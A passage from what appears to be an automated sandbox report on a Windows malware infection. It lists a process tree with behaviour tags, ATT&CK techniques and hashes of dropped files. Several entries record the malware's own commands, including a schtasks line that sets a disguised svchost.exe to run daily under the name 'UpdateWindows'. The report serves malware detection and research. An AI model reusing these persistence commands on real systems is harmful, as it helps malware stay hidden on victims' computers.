                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4196
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4348
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4476
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Modifies registry class
                                                                                            PID:4304
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                            1⤵
                                                                                            • Enumerates connected drives
                                                                                            • Drops file in Program Files directory
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4280
                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding AA87AEFB3972BBBD55A93B0B054FFA93 C
                                                                                              2⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:4620
                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding A7ED4D60E535496E0C383A2BAF32C59F
                                                                                              2⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Loads dropped DLL
                                                                                              PID:6120
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                3⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:3484
                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding EB42033FDBC123620A9656B0AF82C884 E Global\MSI0000
                                                                                              2⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:2252
                                                                                          • C:\Users\Admin\AppData\Local\Temp\4E40.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\4E40.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:5952
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4E40.exe
                                                                                              "{path}"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5852
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4E40.exe
                                                                                              "{path}"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5572
                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3736
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 05:55 /du 23:59 /sc daily /ri 1 /f
                                                                                                3⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:4104
                                                                                          • C:\Users\Admin\AppData\Local\Temp\51BC.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\51BC.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:992
                                                                                          • C:\Users\Admin\AppData\Local\Temp\56FC.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\56FC.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:5472
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              2⤵
                                                                                                PID:3328
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                2⤵
                                                                                                  PID:2272
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5EBE.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5EBE.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4640
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 736
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:4104
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 748
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:2332
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 848
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:5016
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 896
                                                                                                  2⤵
                                                                                                  • Program crash
                                                                                                  PID:2340
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 900
                                                                                                  2⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  PID:5124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\63EF.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\63EF.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:196
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  2⤵
                                                                                                    PID:5240
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5760
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5840
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:3900
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:4556
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4244
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:6124
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4584
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4684
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:4440
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:4560
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:4988

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Execution

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1060

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Privilege Escalation

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Defense Evasion

                                                                                                                      Modify Registry

                                                                                                                      3
                                                                                                                      T1112

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      3
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Software Discovery

                                                                                                                      1
                                                                                                                      T1518

                                                                                                                      Query Registry

                                                                                                                      5
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      5
                                                                                                                      T1082

                                                                                                                      Security Software Discovery

                                                                                                                      1
                                                                                                                      T1063

                                                                                                                      Peripheral Device Discovery

                                                                                                                      2
                                                                                                                      T1120

                                                                                                                      Remote System Discovery

                                                                                                                      1
                                                                                                                      T1018

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      3
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files\Windows Defender Advanced Threat Protection\QBDGNCLYVV\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\Windows Defender Advanced Threat Protection\QBDGNCLYVV\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                        MD5

                                                                                                                        0d0e81f0756c606f91750b490e71ae7b

                                                                                                                        SHA1

                                                                                                                        ef11c566a508757912305e8da612c6d2acfc1670

                                                                                                                        SHA256

                                                                                                                        cb6c9784bb3f77d9fbe4ec75cac232fd33562bced9e7fe26e93a36a3a8941bfc

                                                                                                                        SHA512

                                                                                                                        4ae3a0af86dd84def89647e2fac6e95e387b48e588ca0884f5fceba365927dc4905912ae7a179b24c55c5d78e93e0ac7a389d501c96e681aa356df2d22d199fc

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                        MD5

                                                                                                                        b0b41126565a0a6e9983b80bbeeeda52

                                                                                                                        SHA1

                                                                                                                        55de1515ae28f594d7eb30211df6aa99b2ce6bd5

                                                                                                                        SHA256

                                                                                                                        74e93fcf70e5301715d1d53cc2e2a1eb484bcad74baea28bbe648a5161e0c5a5

                                                                                                                        SHA512

                                                                                                                        0b31bc5ec69834e7e9228bf373176286c697f7ac23a541f655aa4bc50284ea643d25c3cdbd7ecf1e4e0d128c6dc06a74ad1c2480d7a8661ee4d4c7cd25ef7ffc

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                        MD5

                                                                                                                        b54f2a915331d775a2e3545d53ce56b8

                                                                                                                        SHA1

                                                                                                                        5cf39951f9573ab57c30d2f726f8c59ed65a971c

                                                                                                                        SHA256

                                                                                                                        f7b15141a85088b05246d048eff11f2db9edb060db00b7310262b36a6160d59d

                                                                                                                        SHA512

                                                                                                                        5dd422e560eb8905069c4fe6cfcb9a0382b83932cab0340fd39e2aee52d8f50987144d726f03c4efdf4e9bd779608718ab6055512a88a87380e61382dc2692f9

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                        MD5

                                                                                                                        c30995dabe91c2814601668c77e6675b

                                                                                                                        SHA1

                                                                                                                        4a76ad1db64dc333f2eb2f2dfd52b90e95e90e63

                                                                                                                        SHA256

                                                                                                                        684008678977fb1626ae4b0e0a7c9b2c478fc971f554e5b26b91f49393dad3e4

                                                                                                                        SHA512

                                                                                                                        683701487e9788c95c0891d94850610c42a585c10d62aec10ea1be22d1d4ebc2999238f613566ce7921cb4508e6c460d2eae5678cdf2cd10c1c9f314f24c024d

                                                                                                                      • C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
                                                                                                                        MD5

                                                                                                                        de365c3a91796969c699d5d38762eb92

                                                                                                                        SHA1

                                                                                                                        fca3ce6fdabf5f128bdc0bfc3afa869b00c13446

                                                                                                                        SHA256

                                                                                                                        1a18855b9d27a2cd94a7b1b38c87aa72c48999bf67e19d38133cccd047391418

                                                                                                                        SHA512

                                                                                                                        446ccf48148a35669fa8dadc750c4a4f7cac59ccdccfababce984ad1f819582ebd4ace263b61029918674dcdbaf940f602b7dab3437612d31b990bbfac23dadc

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\13zhn2am.elv\google-game.exe
                                                                                                                        MD5

                                                                                                                        531020fb36bb85e2f225f85a368d7067

                                                                                                                        SHA1

                                                                                                                        a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                                                        SHA256

                                                                                                                        370dcae16de62c8cec5f7bf4366ddc62a44f526b31b905a7f4d97bbe3d41fe11

                                                                                                                        SHA512

                                                                                                                        864f1523a984da68aea9ef58e2ef9738ea47cc16ca4cb3f80d598abb09246f2517d5225324f1dd27aa38000e8e2f1642de1a20dfefc6203e558898a7b43f705e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\13zhn2am.elv\google-game.exe
                                                                                                                        MD5

                                                                                                                        531020fb36bb85e2f225f85a368d7067

                                                                                                                        SHA1

                                                                                                                        a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                                                        SHA256

                                                                                                                        370dcae16de62c8cec5f7bf4366ddc62a44f526b31b905a7f4d97bbe3d41fe11

                                                                                                                        SHA512

                                                                                                                        864f1523a984da68aea9ef58e2ef9738ea47cc16ca4cb3f80d598abb09246f2517d5225324f1dd27aa38000e8e2f1642de1a20dfefc6203e558898a7b43f705e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1783142209.exe
                                                                                                                        MD5

                                                                                                                        3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                        SHA1

                                                                                                                        f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                        SHA256

                                                                                                                        2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                        SHA512

                                                                                                                        8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1783142209.exe
                                                                                                                        MD5

                                                                                                                        3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                        SHA1

                                                                                                                        f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                        SHA256

                                                                                                                        2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                        SHA512

                                                                                                                        8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-8a8ea-0b7-70db5-69919251d2fb7\Viraexicypo.exe
                                                                                                                        MD5

                                                                                                                        3ff7832ac6c44aea5e9652a33d5050ad

                                                                                                                        SHA1

                                                                                                                        cbf63d3811674b4fb2249f84d91528f1f3f158a2

                                                                                                                        SHA256

                                                                                                                        9f025665cbd44dcc007927ff1d2b3f26b328c1dfe4892857eaf1f7de7fdf0c3b

                                                                                                                        SHA512

                                                                                                                        7e563621c1912c498f3afe93acade2765acd4f1eccb0cf5c35341a6f4a74971d41c6f94c5b9d64d6120ef4a007c6f539b5bcc96059e3b7c9ced5ec2a44ce37c4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-8a8ea-0b7-70db5-69919251d2fb7\Viraexicypo.exe
                                                                                                                        MD5

                                                                                                                        3ff7832ac6c44aea5e9652a33d5050ad

                                                                                                                        SHA1

                                                                                                                        cbf63d3811674b4fb2249f84d91528f1f3f158a2

                                                                                                                        SHA256

                                                                                                                        9f025665cbd44dcc007927ff1d2b3f26b328c1dfe4892857eaf1f7de7fdf0c3b

                                                                                                                        SHA512

                                                                                                                        7e563621c1912c498f3afe93acade2765acd4f1eccb0cf5c35341a6f4a74971d41c6f94c5b9d64d6120ef4a007c6f539b5bcc96059e3b7c9ced5ec2a44ce37c4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-8a8ea-0b7-70db5-69919251d2fb7\Viraexicypo.exe.config
                                                                                                                        MD5

                                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                                        SHA1

                                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                        SHA256

                                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                        SHA512

                                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7f-facbc-685-729aa-73bc2061ffdba\Cumizhesyna.exe
                                                                                                                        MD5

                                                                                                                        24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                        SHA1

                                                                                                                        50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                        SHA256

                                                                                                                        afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                        SHA512

                                                                                                                        a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7f-facbc-685-729aa-73bc2061ffdba\Cumizhesyna.exe
                                                                                                                        MD5

                                                                                                                        24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                        SHA1

                                                                                                                        50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                        SHA256

                                                                                                                        afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                        SHA512

                                                                                                                        a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7f-facbc-685-729aa-73bc2061ffdba\Cumizhesyna.exe.config
                                                                                                                        MD5

                                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                                        SHA1

                                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                        SHA256

                                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                        SHA512

                                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7f-facbc-685-729aa-73bc2061ffdba\Kenessey.txt
                                                                                                                        MD5

                                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                                        SHA1

                                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                        SHA256

                                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                        SHA512

                                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI5FEA.tmp
                                                                                                                        MD5

                                                                                                                        d07ddd437009ebb9c21882579bf2df0d

                                                                                                                        SHA1

                                                                                                                        a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                        SHA256

                                                                                                                        c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                        SHA512

                                                                                                                        8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MSI63D3.tmp
                                                                                                                        MD5

                                                                                                                        5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                        SHA1

                                                                                                                        3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                        SHA256

                                                                                                                        0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                        SHA512

                                                                                                                        2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\dch3wtxs.y0e\KiffMainE1.exe
                                                                                                                        MD5

                                                                                                                        9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                        SHA1

                                                                                                                        9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                        SHA256

                                                                                                                        bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                        SHA512

                                                                                                                        0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\dch3wtxs.y0e\KiffMainE1.exe
                                                                                                                        MD5

                                                                                                                        9ffeb510285c1c7450b00cad5cf7e28b

                                                                                                                        SHA1

                                                                                                                        9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                                                        SHA256

                                                                                                                        bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                                                        SHA512

                                                                                                                        0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        MD5

                                                                                                                        b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                        SHA1

                                                                                                                        d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                        SHA256

                                                                                                                        fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                        SHA512

                                                                                                                        98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        MD5

                                                                                                                        b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                        SHA1

                                                                                                                        d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                        SHA256

                                                                                                                        fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                        SHA512

                                                                                                                        98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.dat
                                                                                                                        MD5

                                                                                                                        93215e8067af15859be22e997779862b

                                                                                                                        SHA1

                                                                                                                        7ac96daef975a1ec678ed6e3c199c6fa1419c8c1

                                                                                                                        SHA256

                                                                                                                        a456dab6d051d3670cdd85708e6d4ffb22123e9348ecdc818f2570ff04940fd0

                                                                                                                        SHA512

                                                                                                                        b8e45b3b786ddef156121909143db009b5b37663e8c225d3ccc88d04a712cc341b6ed122c9af5132d8c36fab7556464d25c780de5bcfd55819a2c96ebd765efb

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.dll
                                                                                                                        MD5

                                                                                                                        b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                                                        SHA1

                                                                                                                        0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                                                        SHA256

                                                                                                                        9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                                                        SHA512

                                                                                                                        f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6CDF1.tmp\Ultra.exe
                                                                                                                        MD5

                                                                                                                        cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                        SHA1

                                                                                                                        ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                        SHA256

                                                                                                                        0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                        SHA512

                                                                                                                        49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6CDF1.tmp\Ultra.exe
                                                                                                                        MD5

                                                                                                                        cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                        SHA1

                                                                                                                        ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                        SHA256

                                                                                                                        0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                        SHA512

                                                                                                                        49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-QPCT5.tmp\ultramediaburner.tmp
                                                                                                                        MD5

                                                                                                                        4e8c7308803ce36c8c2c6759a504c908

                                                                                                                        SHA1

                                                                                                                        a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                        SHA256

